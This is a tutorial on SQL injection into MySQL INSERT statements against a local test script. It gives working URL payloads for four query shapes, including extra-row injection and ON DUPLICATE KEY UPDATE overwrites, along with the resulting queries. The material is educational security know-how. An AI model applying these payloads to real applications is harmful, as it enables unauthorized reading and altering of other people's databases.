INSERT Statement Sql Injection – Advanced – Tutorial

Hello everyone,

My friend Cyde and I have been looking at a project it’s been few days and we found a lot of Sql Injection vulnerabilities where most of the statements where INSERT Statements and not the usual SELECT. Now I know that most people think that these kinds of injections are difficult and hard to deal with and that’s why in this Tutorial I’ll explain how to handle 4 different techniques of injection.

The information

• Database/Table

What matters the most in this Table is that the column ‘id’ is Unique and Auto Increments; whenever a new comment is added, it gets a unique id even if we don’t specify it. Keep that in mind.

• Insert Script: http://127.0.0.1/insert.php

It requires two Get variables only, ‘videoid’ and ‘comment’. The username is automatically set to ‘dotcppfile’ and the id is automated.

That’s all we need to insert a comment:
http://127.0.0.1/insert.php?videoid=123456&comment=interesting

• The comments that we insert shows up at: http://127.0.0.1/comments.php (source: http://pastebin.com/58w0h2Nw)

Our Queries:

• INSERT INTO comments (‘comment’ ,’username’, ‘videoid’) VALUES (‘interesting’, ‘dotcppfile’, ‘123456’) //comment is vulnerable
• INSERT INTO comments (‘comment’ ,’username’, ‘videoid’) VALUES (‘interesting’, ‘dotcppfile’, ‘123456’) //videoid is vulnerable
• INSERT INTO comments SET comment = ‘interesting’, username = ‘dotcppfile’, ‘videoid’ = ‘123456’ //comment is vulnerable
• INSERT INTO comments SET comment = ‘interesting’, username = ‘dotcppfile’, ‘videoid’ = ‘123456’ //videoid is vulnerable

As you can see, the vulnerable column changes so does the syntax of the query and each one of them needs to be handled in a different way.

Query 1:

INSERT INTO comments (‘comment’ ,’username’, ‘videoid’) VALUES (‘interesting’, ‘dotcppfile’, ‘123456’).

Column ‘comment’ is vulnerable.

If we want to inject a proper select statement into this we should go for:
http://127.0.0.1/insert.php?videoid=123456&comment=interesting ‘, (select version()), ‘123456’)–+

Our Original INSERT Statement will become:

INSERT INTO comments (‘comment’ ,’username’, ‘videoid’) VALUES (‘interesting’, (select version()), ‘123456’)–+’, ‘dotcppfile’, ‘123456’)

Now everything after –+ will be considered as a comment and what gets inserted in the database is a comment that says “interesting” and was posted by ‘select version()’:We’ve seen that before and it’s really simple but there’s a lot more to it so keep reading.

Query 2:

INSERT INTO comments (‘comment’ ,’username’, ‘videoid’) VALUES (‘interesting’, ‘dotcppfile’, ‘123456’)

Column ‘videoid’ is vulnerable.

We have a big difference, what we used before won’t work, because we cannot edit the username, the comment or the videoid since they’re placed before our injection point.

Fortunately, in an INSERT Statement, you can insert multiple rows at a time using something like this:

INSERT into comments (‘comment’, ‘username’, ‘videoid’) VALUES (‘first comment’, ‘dotcppfile’, ‘123456’), (‘second comment’, ‘dotcppfile’, ‘123456’)

We are going to use this right now to get things working:
http://127.0.0.1/insert.php?comment=interesting&videoid=123456 ‘), (‘second comment’, (select version()), ‘123456’)–+

Our INSERT Statement will become:

INSERT into comments (‘comment’, ‘username’, ‘videoid’) VALUES (‘first comment’, ‘dotcppfile’, ‘123456’), (‘second comment’, (select version()), ‘123456’)–+’)

And the output on ‘comments.php’ will be:
So two comments were inserted and the second one was holding the result of our SELECT Statement.

Query 3:

INSERT INTO comments SET comment = ‘interesting’, username = ‘dotcppfile’, ‘videoid’ = ‘123456’

Column ‘comment’ is vulnerable.

This will work:
http://127.0.0.1/insert.php?videoid=123456&comment=interesting ‘, username=(select version()), videoid=’123456’–+

Our INSERT Statement will become:

INSERT INTO comments SET comment = ‘interesting’, username=(select version()), videoid=’123456′–+’, username = ‘dotcppfile’, ‘videoid’ = ‘123456’

Nothing special about this one either, we’ve seen it before, but what about the last one?

Query 4:

INSERT INTO comments SET comment = ‘interesting’, username = ‘dotcppfile’, ‘videoid’ = ‘123456’

Column ‘videoid’ is vulnerable.

Now this is something different and our solution for Query 2 will not work because inserting more than two rows in this type of insert statements is not possible.

We did say that every comment gets its own unique id and, believe it or not, this will be very helpful.

Even thought the insert statement doesn’t provide a value for the id, since it’s automated, this doesn’t mean that we can’t provide it. So lets create a normal comment and give it a specified id.
Warning: We have to make sure that the ‘id’ we’re giving is unique or else we will get a ‘mysql error’.

http://127.0.0.1/insert.php?comment=interesting&videoid=123456 ‘, id=2147483640–+

Our INSERT Statement will become:

INSERT INTO comments SET comment = ‘interesting’, username = ‘dotcppfile’, ‘videoid’ = ‘123456’, id=2147483640–+’

And if we check the ‘comments.php’ page:

If we take a look at Data in the Table:

As you can see, our own ‘id’ was inserted, but, what’s the point?

What we are trying to do here is use the INSERT … ON DUPLICATE KEY UPDATE statement: http://dev.mysql.com/doc/refman/5.0/en/insert-on-duplicate.html
This statement can be used to Update instead of Inserting a row of data when the id given already exists.

Example:
If we have the following Data in the Table:
2147483640 | 123456 | dotcppfile | interesting
And we try to insert the following using the INSERT … ON DUPLICATE KEY UPDATE statement:
2147483640 | 123456 | dotcppfile | second comment
It won’t be inserted but the main data will be updated and it will become:
2147483640 | 123456 | dotcppfile | second comment

That’s what we’re going to use:
http://127.0.0.1/insert.php?comment=interesting&videoid=123456 ‘, id=2147483640 ON DUPLICATE KEY UPDATE comment=(select version())–+

Our INSERT Statement will become:

INSERT INTO comments SET comment = ‘interesting’, username = ‘dotcppfile’, ‘videoid’ = ‘123456’, id=2147483640 ON DUPLICATE KEY UPDATE comment=(select version())–+

And the results:

So we updated the old comment with a new one that holds the result of any select statement.

 

Those 4 queries with different injection points are mostly everything that’s out there, and we’ve succeeded in injecting all of them, yes, we did good lol.

I hope you learned something new,
that’s all for today,
dotcppfile.